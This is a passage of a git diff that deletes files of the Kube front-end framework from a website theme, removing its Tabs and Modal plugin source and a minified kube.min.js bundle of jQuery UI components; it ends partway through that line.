-    	prev: function(e)
-    	{
-    		if (e) e.preventDefault();
-
-    		var item = this.getItem(this.fetchElement('prev'));
-
-    		this.open(item.hash);
-    		this.callback('prev', item);
-    	},
-    	fetchElement: function(type)
-    	{
-            var element;
-    		if (this.currentItem !== false)
-    		{
-    			// prev or next
-    			element = this.currentItem.$parent[type]().find('a');
-
-    			if (element.length === 0)
-    			{
-    				return;
-    			}
-    		}
-    		else
-    		{
-    			// first
-    			element = this.$items[0];
-    		}
-
-    		return element;
-    	},
-    	open: function(e, push)
-    	{
-        	if (typeof e === 'undefined') return;
-    		if (typeof e === 'object') e.preventDefault();
-
-    		var item = (typeof e === 'object') ? this.getItem(e.target) : this.getItemBy(e);
-    		this.closeAll();
-
-    		this.callback('open', item);
-    		this.addActive(item);
-
-    		// push state (doesn't need to push at the start)
-            this.pushStateOpen(push, item);
-    		this.callback('opened', item);
-    	},
-    	pushStateOpen: function(push, item)
-    	{
-    		if (push !== false && this.opts.hash !== false)
-    		{
-    			history.pushState(false, false, item.hash);
-    		}
-    	},
-    	close: function(num)
-    	{
-    		var item = this.getItemBy(num);
-
-    		if (!item.$parent.hasClass('active'))
-    		{
-    			return;
-    		}
-
-    		this.callback('close', item);
-    		this.removeActive(item);
-    		this.pushStateClose();
-    		this.callback('closed', item);
-
-    	},
-    	pushStateClose: function()
-    	{
-            if (this.opts.hash !== false)
-            {
-    			history.pushState(false, false, ' ');
-    		}
-    	},
-    	closeAll: function()
-    	{
-    		this.$tabs.removeClass('open').addClass('hide');
-    		this.$items.parent().removeClass('active');
-    	},
-    	getItem: function(element)
-    	{
-    		var item = {};
-
-    		item.$el = $(element);
-    		item.hash = item.$el.attr('href');
-    		item.$parent = item.$el.parent();
-    		item.$tab = $(item.hash);
-
-    		return item;
-    	},
-    	getItemBy: function(num)
-    	{
-    		var element = (typeof num === 'number') ? this.$items.eq(num-1) : this.$element.find('[rel="' + num + '"]');
-
-    		return this.getItem(element);
-    	},
-    	getLocationHash: function()
-    	{
-    		if (this.opts.hash === false)
-    		{
-    			return false;
-    		}
-
-    		return (this.isHash()) ? top.location.hash : false;
-    	},
-    	isHash: function()
-    	{
-        	return !(top.location.hash === '' || $.inArray(top.location.hash, this.hashesCollection) === -1);
-    	},
-    	setItemHeight: function()
-    	{
-    		if (this.opts.equals)
-    		{
-    	    	var minHeight = this.getItemMaxHeight() + 'px';
-        		this.$tabs.css('min-height', minHeight);
-    		}
-    	},
-    	getItemMaxHeight: function()
-    	{
-    		var max = 0;
-    		this.$tabs.each(function()
-    		{
-    			var h = $(this).height();
-    			max = h > max ? h : max;
-    		});
-
-    		return max;
-    	}
-    };
-
-    // Inheritance
-    Kube.Tabs.inherits(Kube);
-
-    // Plugin
-    Kube.Plugin.create('Tabs');
-    Kube.Plugin.autoload('Tabs');
-
-}(Kube));
-/**
- * @library Kube Modal
- * @author Imperavi LLC
- * @license MIT
- */
-(function($)
-{
-    $.modalcurrent = null;
-	$.modalwindow = function(options)
-	{
-    	var opts = $.extend({}, options, { show: true });
-    	var $element = $('<span />');
-
-    	$element.modal(opts);
-	};
-
-})(jQuery);
-
-(function(Kube)
-{
-    Kube.Modal = function(element, options)
-    {
-        this.namespace = 'modal';
-        this.defaults = {
-            target: null,
-            show: false,
-    		url: false,
-    		header: false,
-    		width: '600px', // string
-    		height: false, // or string
-    		maxHeight: false,
-    		position: 'center', // top or center
-    		overlay: true,
-    		appendForms: false,
-    		appendFields: false,
-    		animationOpen: 'show',
-        	animationClose: 'hide',
-    		callbacks: ['open', 'opened', 'close', 'closed']
-        };
-
-        // Parent Constructor
-        Kube.apply(this, arguments);
-
-        // Services
-        this.utils = new Kube.Utils();
-        this.detect = new Kube.Detect();
-
-        // Initialization
-        this.start();
-    };
-
-    // Functionality
-    Kube.Modal.prototype = {
-        start: function()
-        {
-            if (!this.hasTarget())
-    		{
-    			return;
-    		}
-
-            if (this.opts.show) this.load();
-    		else this.$element.on('click.' + this.namespace, $.proxy(this.load, this));
-    	},
-    	buildModal: function()
-    	{
-    		this.$modal = this.$target.find('.modal');
-    		this.$header = this.$target.find('.modal-header');
-    		this.$close = this.$target.find('.close');
-    		this.$body = this.$target.find('.modal-body');
-    	},
-    	buildOverlay: function()
-    	{
-    		if (this.opts.overlay === false)
-    		{
-    			return;
-    		}
-
-    		if ($('#modal-overlay').length !== 0)
-    		{
-    			this.$overlay = $('#modal-overlay');
-    		}
-    		else
-    		{
-    			this.$overlay = $('<div id="modal-overlay">').addClass('hide');
-    			$('body').prepend(this.$overlay);
-    		}
-
-    		this.$overlay.addClass('overlay');
-    	},
-    	buildHeader: function()
-    	{
-        	if (this.opts.header) this.$header.html(this.opts.header);
-    	},
-    	load: function(e)
-    	{
-    		this.buildModal();
-    		this.buildOverlay();
-    		this.buildHeader();
-
-            if (this.opts.url) this.buildContent();
-            else               this.open(e);
-    	},
-    	open: function(e)
-    	{
-        	if (e) e.preventDefault();
-
-            if (this.isOpened())
-    		{
-    			return;
-    		}
-
-    		if (this.detect.isMobile()) this.opts.width = '96%';
-    		if (this.opts.overlay)      this.$overlay.removeClass('hide');
-
-    		this.$target.removeClass('hide');
-    		this.$modal.removeClass('hide');
-
-            this.enableEvents();
-    		this.findActions();
-
-    		this.resize();
-    		$(window).on('resize.' + this.namespace, $.proxy(this.resize, this));
-
-    		if (this.detect.isDesktop()) this.utils.disableBodyScroll();
-
-    		// enter
-    		this.$modal.find('input[type=text],input[type=url],input[type=email]').on('keydown.' + this.namespace, $.proxy(this.handleEnter, this));
-
-    		this.callback('open');
-    		this.$modal.animation(this.opts.animationOpen, $.proxy(this.onOpened, this));
-        },
-        close: function(e)
-        {
-            if (!this.$modal || !this.isOpened())
-    		{
-    			return;
-    		}
-
-    		if (e)
-    		{
-    			if (this.shouldNotBeClosed(e.target))
-    			{
-    				return;
-    			}
-
-    			e.preventDefault();
-    		}
-
-    		this.callback('close');
-    		this.disableEvents();
-
-    		this.$modal.animation(this.opts.animationClose, $.proxy(this.onClosed, this));
-
-            if (this.opts.overlay) this.$overlay.animation(this.opts.animationClose);
-        },
-    	onOpened: function()
-    	{
-    		this.$modal.addClass('open');
-            this.callback('opened');
-
-            $.modalcurrent = this;
-    	},
-    	onClosed: function()
-    	{
-    		this.callback('closed');
-
-            this.$target.addClass('hide');
-            this.$modal.removeClass('open');
-
-    		if (this.detect.isDesktop()) this.utils.enableBodyScroll();
-
-    		this.$body.css('height', '');
-            $.modalcurrent = null;
-    	},
-    	isOpened: function()
-    	{
-        	return (this.$modal.hasClass('open'));
-    	},
-    	getData: function()
-    	{
-            var formdata = new Kube.FormData(this);
-            formdata.set('');
-
-            return formdata.get();
-    	},
-    	buildContent: function()
-    	{
-    		$.ajax({
-    			url: this.opts.url + '?' + new Date().getTime(),
-    			cache: false,
-    			type: 'post',
-    			data: this.getData(),
-    			success: $.proxy(function(data)
-    			{
-    				this.$body.html(data);
-    				this.open();
-
-    			}, this)
-    		});
-    	},
-    	buildWidth: function()
-    	{
-    		var width = this.opts.width;
-    		var top = '2%';
-    		var bottom = '2%';
-    		var percent = width.match(/%$/);
-
-    		if ((parseInt(this.opts.width) > $(window).width()) && !percent)
-    		{
-                width = '96%';
-    		}
-    		else if (!percent)
-    		{
-                top = '16px';
-                bottom = '16px';
-    		}
-
-    		this.$modal.css({ 'width': width, 'margin-top': top, 'margin-bottom': bottom });
-
-    	},
-    	buildPosition: function()
-    	{
-    		if (this.opts.position !== 'center')
-    		{
-    			return;
-    		}
-
-    		var windowHeight = $(window).height();
-    		var height = this.$modal.outerHeight();
-    		var top = (windowHeight/2 - height/2) + 'px';
-
-    		if (this.detect.isMobile())     top = '2%';
-    		else if (height > windowHeight) top = '16px';
-
-    		this.$modal.css('margin-top', top);
-    	},
-    	buildHeight: function()
-    	{
-    		var windowHeight = $(window).height();
-
-    		if (this.opts.maxHeight)
-    		{
-        		var padding = parseInt(this.$body.css('padding-top')) + parseInt(this.$body.css('padding-bottom'));
-        		var margin = parseInt(this.$modal.css('margin-top')) + parseInt(this.$modal.css('margin-bottom'));
-    			var height = windowHeight - this.$header.innerHeight() - padding - margin;
-
-    			this.$body.height(height);
-    		}
-    		else if (this.opts.height !== false)
-    		{
-    			this.$body.css('height', this.opts.height);
-    		}
-
-    		var modalHeight = this.$modal.outerHeight();
-    		if (modalHeight > windowHeight)
-    		{
-    			this.opts.animationOpen = 'show';
-    			this.opts.animationClose = 'hide';
-    		}
-    	},
-    	resize: function()
-    	{
-    		this.buildWidth();
-    		this.buildPosition();
-    		this.buildHeight();
-    	},
-    	enableEvents: function()
-    	{
-    		this.$close.on('click.' + this.namespace, $.proxy(this.close, this));
-    		$(document).on('keyup.' + this.namespace, $.proxy(this.handleEscape, this));
-    		this.$target.on('click.' + this.namespace, $.proxy(this.close, this));
-    	},
-    	disableEvents: function()
-    	{
-    		this.$close.off('.' + this.namespace);
-    		$(document).off('.' + this.namespace);
-    		this.$target.off('.' + this.namespace);
-    		$(window).off('.' + this.namespace);
-    	},
-    	findActions: function()
-    	{
-    		this.$body.find('[data-action="modal-close"]').on('mousedown.' + this.namespace, $.proxy(this.close, this));
-    	},
-    	setHeader: function(header)
-    	{
-    		this.$header.html(header);
-    	},
-    	setContent: function(content)
-    	{
-    		this.$body.html(content);
-    	},
-    	setWidth: function(width)
-    	{
-    		this.opts.width = width;
-    		this.resize();
-    	},
-    	getModal: function()
-    	{
-            return this.$modal;
-    	},
-    	getBody: function()
-    	{
-            return this.$body;
-    	},
-    	getHeader: function()
-    	{
-            return this.$header;
-    	},
-    	handleEnter: function(e)
-    	{
-        	if (e.which === 13)
-        	{
-            	e.preventDefault();
-            	this.close(false);
-            }
-    	},
-    	handleEscape: function(e)
-    	{
-        	return (e.which === 27) ? this.close(false) : true;
-    	},
-    	shouldNotBeClosed: function(el)
-    	{
-            if ($(el).attr('data-action') === 'modal-close' || el === this.$close[0])
-            {
-                return false;
-        	}
-        	else if ($(el).closest('.modal').length === 0)
-        	{
-            	return false;
-        	}
-
-        	return true;
-    	}
-    };
-
-    // Inheritance
-    Kube.Modal.inherits(Kube);
-
-    // Plugin
-    Kube.Plugin.create('Modal');
-    Kube.Plugin.autoload('Modal');
-
-}(Kube));
\ No newline at end of file
diff --git a/website/src/themes/kube/static/js/kube.legenda.js b/website/src/themes/kube/static/js/kube.legenda.js
deleted file mode 100644
index e69de29bb2..0000000000
diff --git a/website/src/themes/kube/static/js/kube.min.js b/website/src/themes/kube/static/js/kube.min.js
deleted file mode 100644
index 267b5aaf83..0000000000
--- a/website/src/themes/kube/static/js/kube.min.js
+++ /dev/null
@@ -1 +0,0 @@
-if("undefined"==typeof jQuery)throw new Error("Kube's requires jQuery");!function(t){var e=t.fn.jquery.split(".");if(1==e[0]&&e[1]<8)throw new Error("Kube's requires at least jQuery v1.8")}(jQuery),function(){Function.prototype.inherits=function(t){var e=function(){};e.prototype=t.prototype;var s=new e;for(var i in this.prototype)s[i]=this.prototype[i];this.prototype=s,this.prototype["super"]=t.prototype};var t=function(t,e){e="object"==typeof e?e:{},this.$element=$(t),this.opts=$.extend(!0,this.defaults,$.fn[this.namespace].options,this.$element.data(),e),this.$target="string"==typeof this.opts.target?$(this.opts.target):null};t.prototype={getInstance:function(){return this.$element.data("fn."+this.namespace)},hasTarget:function(){return!(null===this.$target)},callback:function(t){var e=[].slice.call(arguments).splice(1);return this.$element&&(e=this._fireCallback($._data(this.$element[0],"events"),t,this.namespace,e)),this.$target&&(e=this._fireCallback($._data(this.$target[0],"events"),t,this.namespace,e)),this.opts&&this.opts.callbacks&&$.isFunction(this.opts.callbacks[t])?this.opts.callbacks[t].apply(this,e):e},_fireCallback:function(t,e,s,i){if(t&&"undefined"!=typeof t[e])for(var n=t[e].length,o=0;n>o;o++){var a=t[e][o].namespace;if(a===s)var h=t[e][o].handler.apply(this,i)}return"undefined"==typeof h?i:h}},window.Kube=t}(),function(t){t.Plugin={create:function(e,s){return s="undefined"==typeof s?e.toLowerCase():s,$.fn[s]=function(i,n){var o=Array.prototype.slice.call(arguments,1),a="fn."+s,h=[];return this.each(function(){var s=$(this),l=s.data(a);if(n="object"==typeof i?i:n,l||(s.data(a,{}),s.data(a,l=new t[e](this,n))),"string"==typeof i)if($.isFunction(l[i])){var c=l[i].apply(l,o);void 0!==c&&h.push(c)}else $.error('No such method "'+i+'" for '+e)}),0===h.length||1===h.length?0===h.length?this:h[0]:h},$.fn[s].options={},this},autoload:function(t){for(var e=t.split(","),s=e.length,i=0;s>i;i++){var n=e[i].toLowerCase().split(",").map(function(t){return t.trim()}).join(",");this.autoloadQueue.push(n)}return this},autoloadQueue:[],startAutoload:function(){if(window.MutationObserver&&0!==this.autoloadQueue.length){var t=this,e=new MutationObserver(function(e){e.forEach(function(e){var s=e.addedNodes;0===s.length||1===s.length&&3===s.nodeType||t.startAutoloadOnce()})});e.observe(document,{subtree:!0,childList:!0})}},startAutoloadOnce:function(){var t=this,e=$("[data-component]").not("[data-loaded]");e.each(function(){var e=$(this),s=e.data("component");-1!==t.autoloadQueue.indexOf(s)&&(e.attr("data-loaded",!0),e[s]())})},watch:function(){t.Plugin.startAutoloadOnce(),t.Plugin.startAutoload()}},$(window).on("load",function(){t.Plugin.watch()})}(Kube),function(t){t.Animation=function(e,s,i){this.namespace="animation",this.defaults={},t.apply(this,arguments),this.effect=s,this.completeCallback="undefined"==typeof i?!1:i,this.prefixes=["","-moz-","-o-animation-","-webkit-"],this.queue=[],this.start()},t.Animation.prototype={start:function(){this.isSlideEffect()&&this.setElementHeight(),this.addToQueue(),this.clean(),this.animate()},addToQueue:function(){this.queue.push(this.effect)},setElementHeight:function(){this.$element.height(this.$element.height())},removeElementHeight:function(){this.$element.css("height","")},isSlideEffect:function(){return"slideDown"===this.effect||"slideUp"===this.effect},isHideableEffect:function(){var t=["fadeOut","slideUp","flipOut","zoomOut","slideOutUp","slideOutRight","slideOutLeft"];return-1!==$.inArray(this.effect,t)},isToggleEffect:function(){return"show"===this.effect||"hide"===this.effect},storeHideClasses:function(){this.$element.hasClass("hide-sm")?this.$element.data("hide-sm-class",!0):this.$element.hasClass("hide-md")&&this.$element.data("hide-md-class",!0)},revertHideClasses:function(){this.$element.data("hide-sm-class")?this.$element.addClass("hide-sm").removeData("hide-sm-class"):this.$element.data("hide-md-class")?this.$element.addClass("hide-md").removeData("hide-md-class"):this.$element.addClass("hide")},removeHideClass:function(){this.$element.data("hide-sm-class")?this.$element.removeClass("hide-sm"):this.$element.data("hide-md-class")?this.$element.removeClass("hide-md"):this.$element.removeClass("hide")},animate:function(){if(this.storeHideClasses(),this.isToggleEffect())return this.makeSimpleEffects();this.$element.addClass("kubeanimated"),this.$element.addClass(this.queue[0]),this.removeHideClass();var t=this.queue.length>1?null:this.completeCallback;this.complete("AnimationEnd",$.proxy(this.makeComplete,this),t)},makeSimpleEffects:function(){"show"===this.effect?this.removeHideClass():"hide"===this.effect&&this.revertHideClasses(),"function"==typeof this.completeCallback&&this.completeCallback(this)},makeComplete:function(){this.$element.hasClass(this.queue[0])&&(this.clean(),this.queue.shift(),this.queue.length&&this.animate())},complete:function(t,e,s){var i=t.toLowerCase()+" webkit"+t+" o"+t+" MS"+t;this.$element.one(i,$.proxy(function(){"function"==typeof e&&e(),this.isHideableEffect()&&this.revertHideClasses(),this.isSlideEffect()&&this.removeElementHeight(),"function"==typeof s&&s(this),this.$element.off(i)},this))},clean:function(){this.$element.removeClass("kubeanimated").removeClass(this.queue[0])}},t.Animation.inherits(t)}(Kube),function(t){t.fn.animation=function(e,s){var i="fn.animation";return this.each(function(){var n=t(this),o=n.data(i);n.data(i,{}),n.data(i,o=new Kube.Animation(this,e,s))})},t.fn.animation.options={}}(jQuery),function(t){t.Detect=function(){},t.Detect.prototype={isMobile:function(){return/(iPhone|iPod|BlackBerry|Android)/.test(navigator.userAgent)},isDesktop:function(){return!/(iPhone|iPod|iPad|BlackBerry|Android)/.test(navigator.userAgent)},isMobileScreen:function(){return $(window).width()<=768},isTabletScreen:function(){return $(window).width()>=768&&$(window).width()<=1024},isDesktopScreen:function(){return $(window).width()>1024}}}(Kube),function(t){t.FormData=function(t){this.opts=t.opts},t.FormData.prototype={set:function(t){this.data=t},get:function(t){return this.formdata=t,this.opts.appendForms&&this.appendForms(),this.opts.appendFields&&this.appendFields(),this.data},appendFields:function(){var t=$(this.opts.appendFields);if(0!==t.length){var e=this,s="";this.formdata?t.each(function(){e.data.append($(this).attr("name"),$(this).val())}):(t.each(function(){s+="&"+$(this).attr("name")+"="+$(this).val()}),this.data=""===this.data?s.replace(/^&/,""):this.data+s)}},appendForms:function(){var t=$(this.opts.appendForms);if(0!==t.length)if(this.formdata){var e=this,s=$(this.opts.appendForms).serializeArray();$.each(s,function(t,s){e.data.append(s.name,s.value)})}else{var i=t.serialize();this.data=""===this.data?i:this.data+"&"+i}}}}(Kube),function(t){t.Response=function(t){},t.Response.prototype={parse:function(t){if(""===t)return!1;var e={};try{e=JSON.parse(t)}catch(s){return!1}if(void 0!==e[0])for(var i in e)this.parseItem(e[i]);else this.parseItem(e);return e},parseItem:function(t){return"value"===t.type?$.each(t.data,$.proxy(function(t,e){e=null===e||e===!1?0:e,e=e===!0?1:e,$(t).val(e)},this)):"html"===t.type?$.each(t.data,$.proxy(function(t,e){e=null===e||e===!1?"":e,$(t).html(this.stripslashes(e))},this)):"addClass"===t.type?$.each(t.data,function(t,e){$(t).addClass(e)}):"removeClass"===t.type?$.each(t.data,function(t,e){$(t).removeClass(e)}):"command"===t.type?$.each(t.data,function(t,e){$(e)[t]()}):"animation"===t.type?$.each(t.data,function(t,e){e.opts="undefined"==typeof e.opts?{}:e.opts,$(t).animation(e.name,e.opts)}):"location"===t.type?top.location.href=t.data:"notify"===t.type&&$.notify(t.data),t},stripslashes:function(t){return(t+"").replace(/\0/g,"0").replace(/\\([\\'"])/g,"$1")}}}(Kube),function(t){t.Utils=function(){},t.Utils.prototype={disableBodyScroll:function(){var t=$("html"),e=window.innerWidth;if(!e){var s=document.documentElement.getBoundingClientRect();e=s.right-Math.abs(s.left)}var i=document.body.clientWidth<e,n=this.measureScrollbar();t.css("overflow","hidden"),i&&t.css("padding-right",n)},measureScrollbar:function(){var t=$("body"),e=document.createElement("div");e.className="scrollbar-measure",t.append(e);var s=e.offsetWidth-e.clientWidth;return t[0].removeChild(e),s},enableBodyScroll:function(){$("html").css({overflow:"","padding-right":""})}}}(Kube),function(t){t.Message=function(e,s){this.namespace="message",this.defaults={closeSelector:".close",closeEvent:"click",animationOpen:"fadeIn",animationClose:"fadeOut",callbacks:["open","opened","close","closed"]},t.apply(this,arguments),this.start()},t.Message.prototype={start:function(){this.$close=this.$element.find(this.opts.closeSelector),this.$close.on(this.opts.closeEvent+"."+this.namespace,$.proxy(this.close,this)),this.$element.addClass("open")},stop:function(){this.$close.off("."+this.namespace),this.$element.removeClass("open")},open:function(t){t&&t.preventDefault(),this.isOpened()||(this.callback("open"),this.$element.animation(this.opts.animationOpen,$.proxy(this.onOpened,this)))},isOpened:function(){return this.$element.hasClass("open")},onOpened:function(){this.callback("opened"),this.$element.addClass("open")},close:function(t){t&&t.preventDefault(),this.isOpened()&&(this.callback("close"),this.$element.animation(this.opts.animationClose,$.proxy(this.onClosed,this)))},onClosed:function(){this.callback("closed"),this.$element.removeClass("open")}},t.Message.inherits(t),t.Plugin.create("Message"),t.Plugin.autoload("Message")}(Kube),function(t){t.Sticky=function(e,s){this.namespace="sticky",this.defaults={classname:"fixed",offset:0,callbacks:["fixed","unfixed"]},t.apply(this,arguments),this.start()},t.Sticky.prototype={start:function(){this.offsetTop=this.getOffsetTop(),this.load(),$(window).scroll($.proxy(this.load,this))},getOffsetTop:function(){return this.$element.offset().top},load:function(){return this.isFix()?this.fixed():this.unfixed()},isFix:function(){return $(window).scrollTop()>this.offsetTop+this.opts.offset},fixed:function(){this.$element.addClass(this.opts.classname).css("top",this.opts.offset+"px"),this.callback("fixed")},unfixed:function(){this.$element.removeClass(this.opts.classname).css("top",""),this.callback("unfixed")}},t.Sticky.inherits(t),t.Plugin.create("Sticky"),t.Plugin.autoload("Sticky")}(Kube),function(t){t.Toggleme=function(e,s){this.namespace="toggleme",this.defaults={toggleEvent:"click",target:null,text:"",animationOpen:"slideDown",animationClose:"slideUp",callbacks:["open","opened","close","closed"]},t.apply(this,arguments),this.start()},t.Toggleme.prototype={start:function(){this.hasTarget()&&this.$element.on(this.opts.toggleEvent+"."+this.namespace,$.proxy(this.toggle,this))},stop:function(){this.$element.off("."+this.namespace),this.revertText()},toggle:function(t){this.isOpened()?this.close(t):this.open(t)},open:function(t){t&&t.preventDefault(),this.isOpened()||(this.storeText(),this.callback("open"),this.$target.animation("slideDown",$.proxy(this.onOpened,this)),setTimeout($.proxy(this.replaceText,this),100))},close:function(t){t&&t.preventDefault(),this.isOpened()&&(this.callback("close"),this.$target.animation("slideUp",$.proxy(this.onClosed,this)))},isOpened:function(){return this.$target.hasClass("open")},onOpened:function(){this.$target.addClass("open"),this.callback("opened")},onClosed:function(){this.$target.removeClass("open"),this.revertText(),this.callback("closed")},storeText:function(){this.$element.data("replacement-text",this.$element.html())},revertText:function(){var t=this.$element.data("replacement-text");t&&this.$element.html(t),this.$element.removeData("replacement-text")},replaceText:function(){""!==this.opts.text&&this.$element.html(this.opts.text)}},t.Toggleme.inherits(t),t.Plugin.create("Toggleme"),t.Plugin.autoload("Toggleme")}(Kube),function(t){t.Offcanvas=function(e,s){this.namespace="offcanvas",this.defaults={target:null,push:!0,width:"250px",direction:"left",toggleEvent:"click",clickOutside:!0,animationOpen:"slideInLeft",animationClose:"slideOutLeft",callbacks:["open","opened","close","closed"]},t.apply(this,arguments),this.utils=new t.Utils,this.detect=new t.Detect,this.start()},t.Offcanvas.prototype={start:function(){this.hasTarget()&&(this.buildTargetWidth(),this.buildAnimationDirection(),this.$close=this.getCloseLink(),this.$element.on(this.opts.toggleEvent+"."+this.namespace,$.proxy(this.toggle,this)),this.$target.addClass("offcanvas"))},stop:function(){this.closeAll(),this.$element.off("."+this.namespace),this.$close.off("."+this.namespace),$(document).off("."+this.namespace)},toggle:function(t){this.isOpened()?this.close(t):this.open(t)},buildTargetWidth:function(){this.opts.width=$(window).width()<parseInt(this.opts.width)?"100%":this.opts.width},buildAnimationDirection:function(){"right"===this.opts.direction&&(this.opts.animationOpen="slideInRight",this.opts.animationClose="slideOutRight")},getCloseLink:function(){return this.$target.find(".close")},open:function(t){t&&t.preventDefault(),this.isOpened()||(this.closeAll(),this.callback("open"),this.$target.addClass("offcanvas-"+this.opts.direction),this.$target.css("width",this.opts.width),this.pushBody(),this.$target.animation(this.opts.animationOpen,$.proxy(this.onOpened,this)))},closeAll:function(){var t=$(document).find(".offcanvas");0!==t.length&&(t.each(function(){var t=$(this);t.hasClass("open")&&(t.css("width","").animation("hide"),t.removeClass("open offcanvas-left offcanvas-right"))}),$(document).off("."+this.namespace),$("body").css("left",""))},close:function(t){if(t){var e=$(t.target),s="A"===e[0].tagName||"BUTTON"===e[0].tagName;if(s&&0!==e.closest(".offcanvas").length&&!e.hasClass("close"))return;t.preventDefault()}this.isOpened()&&(this.utils.enableBodyScroll(),this.callback("close"),this.pullBody(),this.$target.animation(this.opts.animationClose,$.proxy(this.onClosed,this)))},isOpened:function(){return this.$target.hasClass("open")},onOpened:function(){this.opts.clickOutside&&$(document).on("click."+this.namespace,$.proxy(this.close,this)),this.detect.isMobileScreen()&&$("html").addClass("no-scroll"),$(document).on("keyup."+this.namespace,$.proxy(this.handleKeyboard,this)),this.$close.on("click."+this.namespace,$.proxy(this.close,this)),this.utils.disableBodyScroll(),this.$target.addClass("open"),this.callback("opened")},onClosed:function(){this.detect.isMobileScreen()&&$("html").removeClass("no-scroll"),this.$target.css("width","").removeClass("offcanvas-"+this.opts.direction),this.$close.off("."+this.namespace),$(document).off("."+this.namespace),this.$target.removeClass("open"),this.callback("closed")},handleKeyboard:function(t){27===t.which&&this.close()},pullBody:function(){this.opts.push&&$("body").animate({left:0},350,function(){$(this).removeClass("offcanvas-push-body")})},pushBody:function(){if(this.opts.push){var t="left"===this.opts.direction?{left:this.opts.width}:{left:"-"+this.opts.width};$("body").addClass("offcanvas-push-body").animate(t,200)}}},t.Offcanvas.inherits(t),t.Plugin.create("Offcanvas"),t.Plugin.autoload("Offcanvas")}(Kube),function(t){t.Collapse=function(e,s){this.namespace="collapse",this.defaults={target:null,toggle:!0,active:!1,toggleClass:"collapse-toggle",boxClass:"collapse-box",callbacks:["open","opened","close","closed"],hashes:[],currentHash:!1,currentItem:!1},t.apply(this,arguments),this.start()},t.Collapse.prototype={start:function(){this.$items=this.getItems(),this.$items.each($.proxy(this.loadItems,this)),this.$boxes=this.getBoxes(),this.setActiveItem()},getItems:function(){return this.$element.find("."+this.opts.toggleClass)},getBoxes:function(){return this.$element.find("."+this.opts.boxClass)},loadItems:function(t,e){var s=this.getItem(e);s.$el.attr("rel",s.hash),$(s.hash).hasClass("hide")||(this.opts.currentItem=s,this.opts.active=s.hash,s.$el.addClass("active")),s.$el.on("click.collapse",$.proxy(this.toggle,this))},setActiveItem:function(){this.opts.active!==!1&&(this.opts.currentItem=this.getItemBy(this.opts.active),this.opts.active=this.opts.currentItem.hash),this.opts.currentItem!==!1&&(this.addActive(this.opts.currentItem),this.opts.currentItem.$box.removeClass("hide"))},addActive:function(t){t.$box.removeClass("hide").addClass("open"),t.$el.addClass("active"),t.$caret!==!1&&t.$caret.removeClass("down").addClass("up"),t.$parent!==!1&&t.$parent.addClass("active"),this.opts.currentItem=t},removeActive:function(t){t.$box.removeClass("open"),t.$el.removeClass("active"),t.$caret!==!1&&t.$caret.addClass("down").removeClass("up"),t.$parent!==!1&&t.$parent.removeClass("active"),this.opts.currentItem=!1},toggle:function(t){t&&t.preventDefault();var e=$(t.target).closest("."+this.opts.toggleClass).get(0)||t.target,s=this.getItem(e);this.isOpened(s.hash)?this.close(s.hash):this.open(t)},openAll:function(){this.$items.addClass("active"),this.$boxes.addClass("open").removeClass("hide")},open:function(t,e){if("undefined"!=typeof t){"object"==typeof t&&t.preventDefault();var s=$(t.target).closest("."+this.opts.toggleClass).get(0)||t.target,i="object"==typeof t?this.getItem(s):this.getItemBy(t);i.$box.hasClass("open")||(this.opts.toggle&&this.closeAll(),this.callback("open",i),this.addActive(i),i.$box.animation("slideDown",$.proxy(this.onOpened,this)))}},onOpened:function(){this.callback("opened",this.opts.currentItem)},closeAll:function(){this.$items.removeClass("active").closest("li").removeClass("active"),this.$boxes.removeClass("open").addClass("hide")},close:function(t){var e=this.getItemBy(t);this.callback("close",e),this.opts.currentItem=e,e.$box.animation("slideUp",$.proxy(this.onClosed,this))},onClosed:function(){var t=this.opts.currentItem;this.removeActive(t),this.callback("closed",t)},isOpened:function(t){return $(t).hasClass("open")},getItem:function(t){var e={};e.$el=$(t),e.hash=e.$el.attr("href"),e.$box=$(e.hash);var s=e.$el.parent();e.$parent="LI"===s[0].tagName?s:!1;var i=e.$el.find(".caret");return e.$caret=0!==i.length?i:!1,e},getItemBy:function(t){var e="number"==typeof t?this.$items.eq(t-1):this.$element.find('[rel="'+t+'"]');return this.getItem(e)}},t.Collapse.inherits(t),t.Plugin.create("Collapse"),t.Plugin.autoload("Collapse")}(Kube),function(t){t.Dropdown=function(e,s){this.namespace="dropdown",this.defaults={target:null,toggleEvent:"click",height:!1,width:!1,animationOpen:"slideDown",animationClose:"slideUp",caretUp:!1,callbacks:["open","opened","close","closed"]},t.apply(this,arguments),this.utils=new t.Utils,this.detect=new t.Detect,this.start()},t.Dropdown.prototype={start:function(){this.buildClose(),this.buildCaret(),this.detect.isMobile()&&this.buildMobileAnimation(),this.$target.addClass("hide"),this.$element.on(this.opts.toggleEvent+"."+this.namespace,$.proxy(this.toggle,this))},stop:function(){this.$element.off("."+this.namespace),this.$target.removeClass("open").addClass("hide"),this.disableEvents()},buildMobileAnimation:function(){this.opts.animationOpen="fadeIn",this.opts.animationClose="fadeOut"},buildClose:function(){this.$close=this.$target.find(".close")},buildCaret:function(){this.$caret=this.getCaret(),this.buildCaretPosition()},buildCaretPosition:function(){var t=this.$element.offset().top+this.$element.innerHeight()+this.$target.innerHeight();$(document).height()>t||(this.opts.caretUp=!0,this.$caret.addClass("up"))},getCaret:function(){return this.$element.find(".caret")},toggleCaretOpen:function(){this.opts.caretUp?this.$caret.removeClass("up").addClass("down"):this.$caret.removeClass("down").addClass("up")},toggleCaretClose:function(){this.opts.caretUp?this.$caret.removeClass("down").addClass("up"):this.$caret.removeClass("up").addClass("down")},toggle:function(t){this.isOpened()?this.close(t):this.open(t)},open:function(t){t&&t.preventDefault(),this.callback("open"),$(".dropdown").removeClass("open").addClass("hide"),this.opts.height&&this.$target.css("min-height",this.opts.height+"px"),this.opts.width&&this.$target.width(this.opts.width),this.setPosition(),this.toggleCaretOpen(),this.$target.animation(this.opts.animationOpen,$.proxy(this.onOpened,this))},close:function(t){if(this.isOpened()){if(t){if(this.shouldNotBeClosed(t.target))return;t.preventDefault()}this.utils.enableBodyScroll(),this.callback("close"),this.toggleCaretClose(),this.$target.animation(this.opts.animationClose,$.proxy(this.onClosed,this))}},onClosed:function(){this.$target.removeClass("open"),this.disableEvents(),this.callback("closed")},onOpened:function(){this.$target.addClass("open"),this.enableEvents(),this.callback("opened")},isOpened:function(){return 